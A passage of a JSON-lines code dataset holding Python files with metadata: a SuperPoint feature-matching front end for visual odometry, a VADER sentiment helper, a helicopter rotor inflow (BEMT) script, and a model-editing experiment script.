SuperPointFrontend\n\t\tself.SuperPoint_Ghostnet = SuperPointFrontend_torch(\n\t\t\tweights_path = self.weights_path, \n\t\t\tnms_dist = self.nms_dist,\n\t\t\tconf_thresh = self.conf_thresh,\n\t\t\tcuda = self.cuda\n\t\t\t)\n\t\t\n\t\tself.tracker = PointTracker(nn_thresh=self.nn_thresh)\n\n\tdef undistortedLineEndPoints(self, scale):\n\n\t\tcur_un_pts = copy.deepcopy(self.curframe_['keyPoint'])\n\t\tids = copy.deepcopy(self.curframe_['PointID'])\n\t\tcur_pts = copy.deepcopy(cur_un_pts * scale)\n\n\t\tfor i in range(cur_pts.shape[1]):\n\t\t\tb = self.camera.liftProjective(cur_pts[:2,i])\n\t\t\tcur_un_pts[0,i] = b[0] / b[2]\n\t\t\tcur_un_pts[1,i] = b[1] / b[2]\n\n\t\treturn cur_un_pts, cur_pts, ids\n\n\n\tdef readImage(self, new_img):\n\n\t\tassert(new_img.ndim==2 and new_img.shape[0]==self.height and new_img.shape[1]==self.width), \"Frame: provided image has not the same size as the camera model or image is not grayscale\"\n\t\t\n\t\tself.new_frame = new_img\n\n\t\tfirst_image_flag = False\n\n\t\tif not self.forwframe_['PointID']:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\tself.curframe_['image'] = self.new_frame\n\t\t\tfirst_image_flag = True\n\n\t\telse:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\n\t\t######################### 提取关键点和描述子 ############################\n\t\tprint('*'*10 + \" current frame \" + '*'*10)\n\t\tstart_time = time()\n\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.015)\n\n\t\tglobal run_time\n\t\trun_time += ( time()-start_time )\n\t\tprint(\"run time is :\", run_time)\n\n\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\tprint(\"current keypoint size is :\", keyPoint_size)\n\n\t\tif keyPoint_size < self.max_cnt-50:\n\t\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.01)\n\t\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\t\tprint(\"next keypoint size is \", keyPoint_size)\n\n\t\t\n\n\t\tfor _ in range(keyPoint_size):\n\t\t\tif first_image_flag == True:\n\t\t\t\tself.forwframe_['PointID'].append(self.allfeature_cnt)\n\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\telse:\n\t\t\t\tself.forwframe_['PointID'].append(-1)\n\t\t\n\t\t##################### 开始处理匹配的特征点 ###############################\n\t\tif self.curframe_['keyPoint'].shape[1] > 0:\n\t\t\tstart_time = time()\n\t\t\tfeature_matches = self.tracker.nn_match_two_way( \n\t\t\t\t\t\t\t\t\tself.forwframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.curframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.nn_thresh\n\t\t\t\t\t\t\t).astype(int)\n\t\t\tglobal match_time\n\t\t\tmatch_time += time()-start_time\n\t\t\tprint(\"match time is :\", match_time)\n\t\t\tprint(\"match size is :\", feature_matches.shape[1])\n\t\t\t######################## 保证匹配得到的lineID相同 #####################\n\t\t\tfor k in range(feature_matches.shape[1]):\n\t\t\t\tself.forwframe_['PointID'][feature_matches[0,k]] = self.curframe_['PointID'][feature_matches[1,k]]\n\n\t\t\t################### 将跟踪的点与没跟踪的点进行区分 #####################\n\t\t\tvecPoint_new = np.zeros((3,0))\n\t\t\tvecPoint_tracked = np.zeros((3,0))\n\t\t\tPointID_new = []\n\t\t\tPointID_tracked = []\n\t\t\tDescr_new = np.zeros((256,0))\n\t\t\tDescr_tracked = np.zeros((256,0))\n\n\t\t\tfor i in range(keyPoint_size):\n\t\t\t\tif self.forwframe_['PointID'][i] == -1 :\n\t\t\t\t\tself.forwframe_['PointID'][i] = self.allfeature_cnt\n\t\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\t\t\tvecPoint_new = np.append(vecPoint_new, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_new.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_new = np.append(Descr_new, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_tracked.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\n\t\t\t########### 跟踪的点特征少于150了,那就补充新的点特征 ###############\n\n\t\t\tdiff_n = self.max_cnt - vecPoint_tracked.shape[1]\n\t\t\tif diff_n > 0:\n\t\t\t\tif vecPoint_new.shape[1] >= diff_n:\n\t\t\t\t\tfor k in range(diff_n):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tfor k in range(vecPoint_new.shape[1]):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\n\t\t\tself.forwframe_['keyPoint'] = vecPoint_tracked\n\t\t\tself.forwframe_['PointID'] = PointID_tracked\n\t\t\tself.forwframe_['descriptor'] = Descr_tracked\n\n\t\tif not self.no_display :\t\n\t\t\tout1 = (np.dstack((self.curframe_['image'], self.curframe_['image'], self.curframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.curframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.curframe_['keyPoint'][0,i]))-3, int(round(self.curframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.curframe_['keyPoint'][0,i]))+3, int(round(self.curframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.curframe_['keyPoint'][0,i])), int(round(self.curframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out1, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out1, pt2, 2, (255, 0, 0), -1)\n\t\t\t\t# cv2.putText(out1, str(self.curframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX , 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out1, 'pre_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tout2 = (np.dstack((self.forwframe_['image'], self.forwframe_['image'], self.forwframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.forwframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.forwframe_['keyPoint'][0,i]))-3, int(round(self.forwframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.forwframe_['keyPoint'][0,i]))+3, int(round(self.forwframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.forwframe_['keyPoint'][0,i])), int(round(self.forwframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out2, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out2, pt2, 2, (0, 0, 255), -1)\n\t\t\t\t# cv2.putText(out2, str(self.forwframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out2, 'cur_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tmin_conf = 0.001\n\t\t\theatmap[heatmap < min_conf] = min_conf\n\t\t\theatmap = -np.log(heatmap)\n\t\t\theatmap = (heatmap - heatmap.min()) / (heatmap.max() - heatmap.min() + .00001)\n\t\t\tout3 = myjet[np.round(np.clip(heatmap*10, 0, 9)).astype('int'), :]\n\t\t\tout3 = (out3*255).astype('uint8')\n\n\t\t\tout = np.hstack((out1, out2, out3))\n\t\t\tout = cv2.resize(out, (3*self.width, self.height))\n\n\t\t\tcv2.namedWindow(\"feature detector window\",1)\n\t\t\t# cv2.resizeWindow(\"feature detector window\", 640*3, 480)\n\t\t\tcv2.imshow('feature detector window',out)\n\t\t\tcv2.waitKey(1)\n\n\t\tself.curframe_ = copy.deepcopy(self.forwframe_)\n\n", "repo_name": "GuoFeng-X/CNN_VINS", "sub_path": "Visual-Front/feature_match.py", "file_name": "feature_match.py", "file_ext": "py", "file_size_in_byte": 8757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 39, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.feature_process.SuperPointFrontend_torch", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.feature_process.PointTracker", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 67, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 68, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 109, "usage_type": "call"}, {"api_name": "time.time", "line_number": 131, "usage_type": "call"}, {"api_name": "time.time", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 190, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 193, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 195, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 201, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 203, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 203, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 212, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 215, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 217, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 218, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 220, "usage_type": "call"}]}
+{"seq_id": "22903032501", "text": "from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nimport numpy as np\n\n\n####### Write your primary function here\ndef sentiment_scores(sentence):\n sent_keys = [\"Negative\", \"Neutral\", \"Positive\"]\n # Create a SentimentIntensityAnalyzer object.\n sid_obj = SentimentIntensityAnalyzer()\n\n # polarity_scores method of SentimentIntensityAnalyzer\n # object gives a sentiment dictionary.\n sentiment_dict = sid_obj.polarity_scores(sentence)\n sent_values = [x for x in sentiment_dict.values()]\n sent_values=sent_values[:3]\n # find the index of the max value\n\n index_max = np.argmax(sent_values)\n\n # decide sentiment as positive, negative and neutral\n final = sent_keys[index_max]\n # responses\n response1=f\"Overall sentiment is {final} with scores: {sentiment_dict}\"\n return response1\n", "repo_name": "plotly-dash-apps/603-movie-reviews-sentiment", "sub_path": "helpers/vader.py", "file_name": "vader.py", "file_ext": "py", "file_size_in_byte": 835, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "10659317267", "text": "## Minor Project code - 2\n## Coded by : G R Krishna Chand Avatar, Kumar Gaurav, Kashish Korotania\n## BEMT - Inflow Distribution and including the Tip Losses\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef prandtl_tip_loss(r,theta):\n global N_b, sol, cl_a, lam_c\n err = 1\n lam_old = (sol*cl_a/16)*(math.sqrt(1 + 32*theta*r/(sol*cl_a)) - 1)\n while(err > 1e-5):\n f = 0.5*N_b*(1-r)/lam_old \n\t\t# f_root = 0.5*N_b*r**2/(1-r)/lam_old\n F = (2/math.pi)*math.acos(math.exp(-f))\n # lam_new = (sol*cl_a/(16*F))*(math.sqrt(1 + 32*F*theta*r/(sol*cl_a)) - 1)\n lam_new = - (sol*cl_a/(16*F) - lam_c/2) + math.sqrt((sol*cl_a/16/F - lam_c/2)**2 + sol*cl_a*theta*r/8/F)\n err = abs(lam_new - lam_old)\n lam_old = lam_new\n return(lam_old) \n# Constant Parameters\nsol = 0.0578 #Solidity\ncl_a = 6.28 #Cl_a\nN_b = 4 #Number of Blades\nlam_c = 0.1 # Non-dimensional axial velocity\n#Initialising Parameters \nr = np.linspace(0,0.999999,500)\nN = len(r)\n# Computation for varying theta\ntheta_o = 10 # pitch angle at root\ntheta_tw = -2.5 # linear twist rate\nth = [] # Theta - pitch angle distribution\ndel_ct = [] # Coefficient of thrust\nlam = [] # Inflow distribution\nlam_no_tip = [] \ndel_ct_no_tip = [] \nfor i in range(N):\n theta = theta_o + theta_tw*r[i]\n th = th + [theta*math.pi/180]\nfor i in range(N):\n lam_t = prandtl_tip_loss(r[i],th[i])\n lam = lam + [lam_t]\n lam_no_tip_t = -(sol*cl_a/16 - lam_c/2) + math.sqrt((sol*cl_a/16 - lam_c/2)**2 + sol*cl_a*th[i]*r[i]/8)\n lam_no_tip = lam_no_tip + [lam_no_tip_t]\n del_ct_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_t*r[i])\n del_ct = del_ct + [del_ct_t]\n del_ct_no_tip_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_no_tip_t*r[i])\n del_ct_no_tip = del_ct_no_tip + [del_ct_no_tip_t]\n\n# Plotting \nplt.plot(r,lam,'b', label='BEMT+Vortex theory')\nplt.plot(r,lam_no_tip, 'm--', label='BEMT')\nplt.xlabel('Non-dimensional radius (r)')\nplt.ylabel('Inflow ratio (lambda)')\nplt.legend(loc=4)\nplt.xticks(np.arange(0,1.1,0.1))\n#plt.ylabel('Inflow ratio (lam)')\nplt.grid(True)\nplt.title('Inflow ratio distribution for theta_root = '+str(theta_o)+' degrees, linear twist rate = '+ str(theta_tw))\nplt.show()\n", "repo_name": "kcavatar/helicopters", "sub_path": "bemt/bemt_including_tip_loss_inflow.py", "file_name": "bemt_including_tip_loss_inflow.py", "file_ext": "py", "file_size_in_byte": 2257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 14, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 14, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 14, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 26, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 38, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]}
+{"seq_id": "72557262247", "text": "import argparse\nimport collections\nimport torch\nimport numpy as np\nimport os, sys\n\nfrom test_CINIC10 import predict\nsys.path.insert(0, 'src')\nimport data_loader.data_loaders as module_data\nimport model.loss as module_loss\nimport model.metric as module_metric\nimport model.model as module_arch\nfrom trainer.editor import Editor\nfrom parse_config import ConfigParser\nfrom trainer import Trainer\nfrom utils import prepare_device, copy_file, read_lists, write_pickle\nfrom utils.edit_utils import prepare_edit_data\nfrom utils.analysis import knn\n\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\ndef main(config):\n logger = config.get_logger('train')\n assert config.config['method'] == 'edit', \"Invalid method '{}'. Must be 'edit'\".format(config.config['method'])\n K = config.config['editor']['K'] # for KNN\n save_dir = str(config.save_dir)\n\n # build model architecture, then print to console\n config.config['arch'].update()\n layernum = config.config['layernum']\n model = config.init_obj('arch', module_arch, layernum=layernum)\n\n\n logger.info(\"Created {} model with {} trainable parameters\".format(config.config['arch']['type'], model.get_n_params()))\n if model.get_checkpoint_path() != \"\":\n logger.info(\"Restored weights from {}\".format(model.get_checkpoint_path()))\n else:\n logger.info(\"Training from scratch.\")\n\n # Create test data loader for metric calculations\n test_data_loader = config.init_obj('data_loader', module_data, split='test')\n logger.info(\"Created test data loader\")\n\n # Prepare for (multi-device) GPU training\n device, device_ids = prepare_device(config['n_gpu'])\n model = model.to(device)\n if len(device_ids) > 1:\n model = torch.nn.DataParallel(model, device_ids=device_ids)\n model.eval() # model should always be in eval() for editing\n\n # Get function handles for loss and metrics\n loss_fn = getattr(module_loss, config['loss'])\n metric_fns = [getattr(module_metric, met) for met in config['metrics']]\n\n # Run initial accuracy check on unedited model\n pre_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log pre-edit results and save to torch file\n logger.info(\"Metrics before editing: {}\".format(pre_edit_log))\n metric_save_path = os.path.join(save_dir, \"pre_edit_test_metrics.pth\")\n torch.save(pre_edit_log, metric_save_path)\n # write_pickle(pickle_path, pre_edit_log)\n\n # Prepare data for edit\n key_image_path = config.config['editor']['key_image_path']\n key_image_paths = read_lists(key_image_path)\n value_image_path = config.config['editor']['value_image_path']\n value_image_paths = read_lists(value_image_path)\n mask_path = config.config['editor']['mask_path']\n\n\n if mask_path != \"\":\n mask_paths = read_lists(mask_path)\n else:\n mask_paths = None\n\n logger.info(\"Key images: {}\".format(key_image_paths))\n logger.info(\"Value images: {}\".format(value_image_paths))\n logger.info(\"Masks: {}\".format(mask_paths))\n\n edit_data = prepare_edit_data(\n key_image_paths=key_image_paths,\n value_image_paths=value_image_paths,\n mask_paths=mask_paths,\n image_size=(32, 32))\n logger.info(\"Prepared data for editing\")\n\n if K > 0:\n # Provide dataloader to perform KNN\n val_paths_data_loader = config.init_obj(\n 'data_loader',\n module_data,\n split='valid',\n return_paths=True)\n logger.info(\"Created validation data loader for KNN calculations\")\n # Concatenate key and value images together\n # First is keys, second is values\n # labels of 'modified_imgs' and 'imgs' are misleading but from the original Editing a Classifier repo\n anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n pre_edit_knn_save_path = os.path.join(save_dir, \"pre_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=pre_edit_knn_save_path)\n logger.info(\"Saving pre-edit KNN results with K={} to {}\".format(K, pre_edit_knn_save_path))\n\n\n # Always use the dummy val_data_loader for covariance calculation\n covariance_data_loader_path = \"data/cinic-10-imagenet-dummy\"\n val_data_loader = module_data.CINIC10DataLoader(\n data_dir=covariance_data_loader_path,\n batch_size=256,\n shuffle=False,\n normalize=False,\n num_workers=8,\n split='valid')\n logger.info(\"Created dataloader for covariance matrix from {} ({})\".format(covariance_data_loader_path, 'valid'))\n\n\n\n # Set up editor\n editor_args = config.config['editor']['args']\n editor_args['arch'] = config.config['arch']['args']['type']\n\n editor = Editor(\n # model=model,\n val_data_loader=val_data_loader,\n **editor_args)\n\n # Create path for caching directory based on\n # (1) validation data dir\n # (2) context model -- architecture, layer number\n val_data_name = val_data_loader.get_data_name()\n model_arch = model.get_type()\n # layernum = editor.get_layernum()\n cache_dir = os.path.join('cache', val_data_name, \"{}-{}\".format(model_arch, layernum))\n logger.info(\"Looking for covariance matrix weights in {}\".format(cache_dir))\n # Perform edit\n editor.edit(\n edit_data=edit_data,\n model=model,\n cache_dir=cache_dir)\n\n model.save_model(save_path=os.path.join(config._save_dir, \"edited_model.pth\"))\n # Evaluate again on test set\n logger.info(\"Evaluating edited model on test set...\")\n post_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log post-edit results and save to torch file\n logger.info(\"Metrics after editing: {}\".format(post_edit_log))\n metric_save_path = os.path.join(save_dir, \"post_edit_test_metrics.pth\")\n torch.save(post_edit_log, metric_save_path)\n # write_pickle(pickle_path, post_edit_log)\n\n\n # Perform post edit KNN analysis\n if K > 0:\n # # Concatenate key and value images together\n # anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n post_edit_knn_save_path = os.path.join(save_dir, \"post_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=post_edit_knn_save_path)\n logger.info(\"Saving post-edit KNN results with K={} to {}\".format(K, post_edit_knn_save_path))\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n\n # custom cli options to modify configuration from default values given in json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float, target='optimizer;args;lr'),\n CustomArgs(['--bs', '--batch_size'], type=int, target='data_loader;args;batch_size'),\n CustomArgs(['--name'], type=str, target='name')\n ]\n parsed_args = args.parse_args()\n\n config = ConfigParser.from_args(args, options)\n main(config)\n", "repo_name": "allisonchen23/model-editing", "sub_path": "old_src/edit_knn.py", "file_name": "edit_knn.py", "file_ext": "py", "file_size_in_byte": 8243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 37, "usage_type": "name"}, {"api_name": "model.model", "line_number": 37, "usage_type": "argument"}, {"api_name": "model.loss.get_n_params", "line_number": 40, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 40, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 41, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 41, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 42, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 42, "usage_type": "name"}, {"api_name": "data_loader.data_loaders", "line_number": 47, "usage_type": "argument"}, {"api_name": "utils.prepare_device", "line_number": 51, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 52, "usage_type": "name"}, {"api_name": "model.loss.to", "line_number": 52, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.DataParallel", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "model.loss.eval", "line_number": 55, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 55, "usage_type": "name"}, {"api_name": "model.loss", "line_number": 58, "usage_type": "argument"}, {"api_name": "model.metric", "line_number": 59, "usage_type": "argument"}, {"api_name": "test_CINIC10.predict", "line_number": 62, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 64, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.edit_utils.prepare_edit_data", "line_number": 92, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 103, "usage_type": "argument"}, {"api_name": "torch.cat", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 113, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 116, "usage_type": "name"}, {"api_name": "data_loader.data_loaders.CINIC10DataLoader", "line_number": 126, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 126, "usage_type": "name"}, {"api_name": "trainer.editor.Editor", "line_number": 141, "usage_type": "call"}, {"api_name": "model.loss.get_type", "line_number": 150, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 150, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 157, "usage_type": "name"}, {"api_name": "model.loss.save_model", "line_number": 160, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 160, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "test_CINIC10.predict", "line_number": 163, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 165, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, 